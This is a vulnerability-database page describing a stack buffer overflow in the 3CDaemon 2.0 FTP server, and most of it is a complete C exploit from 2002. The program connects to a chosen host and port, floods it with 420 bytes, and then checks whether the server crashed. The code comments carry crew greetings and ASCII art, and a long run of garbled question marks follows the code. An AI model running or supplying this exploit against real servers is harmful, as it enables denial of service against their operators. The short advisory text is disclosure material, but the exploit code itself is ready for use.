Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

3CDaemon 2.0 - Buffer Overflow Vulnerability (1)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 17 Views

3CDaemon 2.0 FTP server has a buffer overflow vulnerability, allowing for stack-based overflow condition, enabling malicious code execution or server crash by sending a large amount of data

Code

                                                source: http://www.securityfocus.com/bid/4638/info

3CDaemon is an FTP server developed by Dan Gill of 3Com.

Reportedly, it is possible to initiate a buffer overflow on a host running 3CDaemon.

Submitting an unusually large amount of data to the ftp server, could trigger a stack-based overflow condition. This could potentially allow for malicious users to execute arbitrary code on the server. However, sending random data could cause the application to crash. 

/* MaD SKiLL 'H'
* MsH 4 life! http://www.madskill.tk
* *Private Release*
*
* 3CDaemon 2.0 revision 10 DoS
*
* 11:12 14-4-2002: BOF flaw found by skyrim
*  1:00 15-4-2002: exploit done.
* 23:31 16-4-2002: Edited the exploit slightly, it's a better code now
*
* This program will exploit the buffer overflow vulnerability of
* 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash
* at any time they're send.
*
* Tested on:
* [OS]                                    [version]
*  Windows XP (5.1 - 2600)                 3CDaemon 2.0 revision 10
*
*  ###
* #####      ####                            ##
* ######    ######                         ######
* ######   ########   ########            ########      ######
* ######  ####### ### ###########          ########     #######
* ###### ######## #### ############        ########     #######
* ############### ##### ############        #######     #######
* ############## ######  ############       #######     #######
* ############## #######  ###########        ######    #######
* ############# ########  ### ########       ######  #########
*  ############ ### ####  ### #######        #################
*   ##### ###############  ##########        #################
*    ###  ######### #####  #########         ################
*    #### ######### ##### #########          ################
*     ### ######### #############            ################
*      ## #########  ######                  ######   #######
*          ### ####                          ######   #######
*                                            ######  ########
*                                            ######  ########
*    ####   ## ###### ###  ###        ###    ######  ########
*   ####### ########  ###  ####      #####    #####   #######
*   ###############   ###  ####      #####     #####  #######
*   ####### ########       ####      #####       ##     ###
*   ######  ######### #### ####      #####
*    #####   ######## #### ####       ####
*     ###### ######## #### ####   ### ####   ##
*      ########## ### #### #### ########## ######
*       ######### ### ###########################
*      ##########  ######## #####################
*    #############  ######  ########## ##########
*   ########  #####   ####  ###   ###  ###   ###
*
* I don't know if this will work on versions other then the one I tested it 
on.
* Have fun.
*
* Crew shouts go to: MsH, DFA, uDc
* Personal shouts to: mannie, primus, amok, torment, talented, warsteam, 
frodo, maxxo,
* xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
*
* skyrim ([email protected])
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define BOFSIZE 420

char banner(void) { printf("MaD SKiLL 'H' 3CDaemon 2.0 revision 10 
DoS\n.:[MsH]:.\n   ---\n"); }

void E(char *msg) { perror(msg); exit(1); }

main(int argc, char *argv[])
{
    static char ownage[BOFSIZE];
    int sockfd, sockfd2, n;

    struct sockaddr_in server_addr;
    struct hostent *server;

if (argc != 3) {
    fprintf(stderr,"Usage: %s hostname/ip port\n", argv[0]);
    exit(1);
   }
    banner();
    memset(ownage, 'A', BOFSIZE);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) E("Error occured during opening socket");
    server = gethostbyname(argv[1]);
    if (server == NULL) E("Error occured during host lookup -No such 
host?-\n");

    bzero((char *) &server_addr, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    bcopy((char *)server->h_addr,
         (char *)&server_addr.sin_addr.s_addr,
         server->h_length);
    server_addr.sin_port = htons(atoi(argv[2]));
    printf("Connecting to target FTP server... ");
    if (connect(sockfd,&server_addr,sizeof(server_addr)) < 0) { E("Error 
occured during connecting\n"); }
    printf("Connected, Probing BOF... \n");
    n = write(sockfd,ownage,strlen(ownage));
    if (n < 0) { E("Error occured during writing to socket"); }
    close(sockfd);
    sockfd2=socket(AF_INET, SOCK_STREAM, 0);
    printf("Done, checking if server is dead.. \n");
    sleep(5);
    if (connect(sockfd2,&server_addr,sizeof(server_addr)) < 0) { 
printf("Couldn't establish connection: It seems like it died! =)\n"); 
exit(0); }
    printf("Server is still alive. Perhaps its not vulnerable?\n");
    return 0;
}
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
ftp serverbuffer overflowstack-based overflowmalicious code executionserver crash3cdaemon 2.0 revision 10denial of service
17